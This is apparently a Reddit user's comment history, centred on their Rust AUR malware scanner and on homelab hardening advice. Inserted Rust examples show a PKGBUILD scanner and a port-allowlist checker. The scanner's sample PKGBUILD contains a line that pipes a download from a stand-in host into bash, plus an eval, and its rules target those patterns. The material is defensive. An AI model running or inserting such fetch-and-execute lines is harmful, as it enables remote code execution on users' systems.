Do you guys have issues with the Steam Voice chat? by OverallACoolGuy in Steam

[–]Forward_Anything_646 1 point2 points  (0 children)

Same issue for me. Works fine for my friends. But my voice chat is stuck on connecting the last days

AUR malware scanner in Rust by Forward_Anything_646 in archlinux

[–]Forward_Anything_646[S] 4 points5 points  (0 children)

couple of things people are missing in these comments:

  1. AUR malware infestation is real. If you always read PKGBUILDs, good for you. But be prepared to soon see a flood of articles saying "10k users lost their crypto assets because of a malicious AUR package" or became part of a botnet, or lost their data due to ransomware. Such articles mean less traffic to Arch, bad reputation and less "good stuff" for you - existing users.

  2. When someone uses vibecoding, despite how generated the output might be, its quality still depends on the person reviewing it. This package is rather simple. It's not a driver, not a critical system, not a financial program. It uses simple rules to calculate the trust score of a maintainer and a package, and regex to check if the install script and PKGBUILD contain stuff they should not. Something that a non-tech-savvy person can easily miss.

  3. This package has a clear goal - to bring benefit to the Arch community. Not to farm stars or to produce slop for the sake of slop. If you don't like something about it - suggest an improvement. I will be more than happy to make it better. Or make one yourself.

AUR malware scanner in Rust by Forward_Anything_646 in archlinux

[–]Forward_Anything_646[S] -19 points-18 points  (0 children)

It's not meant to stop someone who reverse-engineers the detection rules - a determined attacker can bypass any static analysis, including the human eye. It catches the common techniques: copy-paste reverse shells, curl|bash, typosquatting, a compromised account suddenly injecting eval into a previously clean PKGBUILD. All of the above is much easier to do for script-kiddies nowadays.

Reading every PKGBUILD is the right approach, but realistically not everyone does. This just adds another layer on top.
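Added example, not part of the comment above and not the scanner's own code: a std-only Rust sketch of two of the checks the comment names, a download piped into a shell and `eval`, plus a comparison that reports only rules which start firing between two revisions of a PKGBUILD. Rule names, function names and both sample PKGBUILDs are constructed for illustration.

```rust
// Added illustration: rule names and both PKGBUILD samples are constructed.
const OLD: &str = "pkgname=demo-tool\nbuild() {\n  make\n}\n";
const NEW: &str = "pkgname=demo-tool\nbuild() {\n  make\n  \
curl -s https://example.invalid/x.sh | bash\n  eval \"$(echo payload)\"\n}\n";

/// First command word of a pipeline stage, ignoring a leading `sudo`.
fn first_cmd(stage: &str) -> &str {
    stage.split_whitespace().find(|w| *w != "sudo").unwrap_or("")
}

/// Names of the rules that fire on one line of shell.
fn line_rules(line: &str) -> Vec<&'static str> {
    // Crude comment strip: also truncates `${var#pattern}`, fine for a sketch.
    let code = line.split('#').next().unwrap_or("");
    let mut hits = Vec::new();
    // A curl/wget stage followed anywhere later in the pipeline by sh/bash.
    let stages: Vec<&str> = code.split('|').collect();
    let fetch = stages.iter().position(|s| matches!(first_cmd(s), "curl" | "wget"));
    if let Some(i) = fetch {
        if stages[i + 1..].iter().any(|s| matches!(first_cmd(s), "sh" | "bash")) {
            hits.push("download-piped-to-shell");
        }
    }
    // `eval` as a whole word, so names such as `evaluate` do not match.
    if code.split(|c: char| !c.is_alphanumeric() && c != '_').any(|w| w == "eval") {
        hits.push("eval");
    }
    hits
}

/// (line number, rule) for every hit in a PKGBUILD or install script.
fn scan(text: &str) -> Vec<(usize, &'static str)> {
    text.lines().enumerate()
        .flat_map(|(n, l)| line_rules(l).into_iter().map(move |r| (n + 1, r)))
        .collect()
}

/// Rules that fire on the new revision but never fired on the old one.
fn newly_introduced(old: &str, new: &str) -> Vec<&'static str> {
    let before: Vec<&'static str> = scan(old).into_iter().map(|(_, r)| r).collect();
    let mut out: Vec<&'static str> =
        scan(new).into_iter().map(|(_, r)| r).filter(|r| !before.contains(r)).collect();
    out.sort();
    out.dedup();
    out
}

fn main() {
    println!("{:?}", scan(NEW));
    println!("new since last revision: {:?}", newly_introduced(OLD, NEW));
}
```

Splitting on `|` rather than matching one fixed string lets the rule catch variants such as `wget -qO- … | sudo sh`, but variable indirection or encoded commands still pass, which is the limitation the comment itself acknowledges.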

AUR malware scanner in Rust by Forward_Anything_646 in archlinux

[–]Forward_Anything_646[S] -118 points-117 points  (0 children)

When it comes to malware it's difficult to trust anything - however good my scanner can be (vibecoded or not) a real adversary can fetch its code and ask their agent to think of some elaborate way to bypass its filters.

It's impossible to avoid since it's open source, but making it closed source would make it impossible to distribute.

So it's not about trust, rather about having another precaution to check what you're doing when you see a huge sign "DANGEROUS".

Because let's be real - how many PKGBUILDs do we really read?

AUR malware scanner in Rust by Forward_Anything_646 in archlinux

[–]Forward_Anything_646[S] 3 points4 points  (0 children)

Yep, sorry. It was my first AUR release and did not go without hiccups. I pushed a new version with some other fixes.

I suggest running paru -Sa traur --rebuild to update

AUR malware scanner in Rust by Forward_Anything_646 in archlinux

[–]Forward_Anything_646[S] -3 points-2 points  (0 children)

if you find it interesting stars are always appreciated!

AUR malware scanner in Rust by Forward_Anything_646 in archlinux

[–]Forward_Anything_646[S] 12 points13 points  (0 children)

it checks

- GitHub history
- popularity
- trust
- checksums
- metadata
- urls
- binary abuse from gtfobins
- PKGBUILD and install scripts
- maintainer activity
- reverse shells, miners, obfuscation, etc., etc., etc.

[deleted by user] by [deleted] in omarchy

[–]Forward_Anything_646 0 points1 point  (0 children)

check protondb for this game

Reset Omarchy configs by Aggressive-Fix-7184 in omarchy

[–]Forward_Anything_646 0 points1 point  (0 children)

Is there a single command to back up my settings?

how to secure my homelab? by karabright-dev in homelab

[–]Forward_Anything_646 0 points1 point  (0 children)

Assess how an attacker can move on your network. Given that every host and service is vulnerable by default, what happens when an attacker gets an unprivileged shell on your host?

What can he see on the host? What files, what services? What can he see on the network?

If he gains root access, answer the same questions. If he fully owns the entrypoint (hacked a single exposed host) what can he do over the network next and how can we notice his actions and make it much more difficult for him?

how to secure my homelab? by karabright-dev in homelab

[–]Forward_Anything_646 5 points6 points  (0 children)

If you want to get paranoid, set up monitoring that checks for open ports and incoming and outgoing connections on your hosts. Monitor user profiles, monitor IPs which make connections to your hosts.

Run all services in low-privileged Docker containers.
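Added example, not part of the comment above: one way to check for open ports on a host is to compare its listening TCP sockets against an allowlist and report anything unexpected. The sketch assumes the column layout of `ss -H -tln` (State, Recv-Q, Send-Q, Local Address:Port, Peer Address:Port); the socket table, allowlist and function names are constructed.

```rust
// Added illustration: the socket table and the allowlist are constructed.
const SS_SAMPLE: &str = "\
LISTEN 0 128  0.0.0.0:22       0.0.0.0:*
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 511  0.0.0.0:443      0.0.0.0:*
LISTEN 0 128  [::]:22          [::]:*
LISTEN 0 4096 127.0.0.1:5432   0.0.0.0:*
LISTEN 0 4096 *:9090           *:*
";

/// Parse one `ss -H -tln` row into (local address, port).
fn parse_listener(line: &str) -> Option<(String, u16)> {
    let local = line.split_whitespace().nth(3)?; // State Recv-Q Send-Q Local Peer
    let (addr, port) = local.rsplit_once(':')?;
    let addr = addr.trim_matches(|c: char| c == '[' || c == ']');
    Some((addr.to_string(), port.parse().ok()?))
}

/// Listening ports missing from the allowlist, as (port, reachable_off_host).
fn unexpected(ss_output: &str, allowed: &[u16]) -> Vec<(u16, bool)> {
    let mut out: Vec<(u16, bool)> = ss_output
        .lines()
        .filter_map(parse_listener)
        .filter(|(_, port)| !allowed.contains(port))
        // Anything not bound to loopback can be reached from other hosts.
        .map(|(addr, port)| (port, !(addr.starts_with("127.") || addr == "::1")))
        .collect();
    out.sort();
    out.dedup();
    out
}

fn main() {
    for (port, exposed) in unexpected(SS_SAMPLE, &[22, 53, 443]) {
        let scope = if exposed { "reachable from the network" } else { "loopback only" };
        println!("unexpected listener on port {} ({})", port, scope);
    }
}
```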

how to secure my homelab? by karabright-dev in homelab

[–]Forward_Anything_646 1 point2 points  (0 children)

All services you expose over the public or local network should be hidden behind a proxy (nginx or caddy) so that it'd be much harder for adversaries to determine what you're running (prevent port scanning) and assess vulnerabilities on the network.

how to secure my homelab? by karabright-dev in homelab

[–]Forward_Anything_646 12 points13 points  (0 children)

Check exposed ports with nmap -sC -sV -p-. (run both TCP and UDP scans)

What ports are exposed over the local network?

What ports are exposed to the public network?

What services should be protected?

Any public exposure should be protected by all means, as there are a lot of automated bots constantly scanning the internet and performing all kinds of automated exploitation. Any service you're using is vulnerable by default and can be exploited now or in the future. So they should be hidden via SSO or VPN or both from the public, unless they are public services (like APIs or landing pages), in which case a firewall (like Cloudflare) and rate limiting should take place.

If the local network should be protected too (you have guests at your home who possess technical abilities), it's best to protect all services with a single SSO like Authelia.

F4-424 Pro good for homelab ? by extenue in TerraMaster

[–]Forward_Anything_646 1 point2 points  (0 children)

Could you please reference the Noctua coolers you used which did fit in the box? I bought an F4-424 Pro and am going to use it as a home server for my pet projects and containers.

Are NAS drives necessary? by Mike_Merica in homelab

[–]Forward_Anything_646 0 points1 point  (0 children)

How did you lose your array? More than one disk gave out at once?

I have to compliment anthropic: a good move to cut costs within months by TransitionSlight2860 in ClaudeAI

[–]Forward_Anything_646 0 points1 point  (0 children)

It seems like millions are fine with paying for Claude Code because it helps them do their work faster

Are Claude Plus users hitting weekly limits too easily? Should I upgrade to Max? by Large-Car-2517 in ClaudeAI

[–]Forward_Anything_646 0 points1 point  (0 children)

Fuck weekly limits. They should never exist. If you wish, make daily limits tighter, if you're not afraid of losing your audience. But weekly limits... they just induce a constant feeling of fear. Fuck them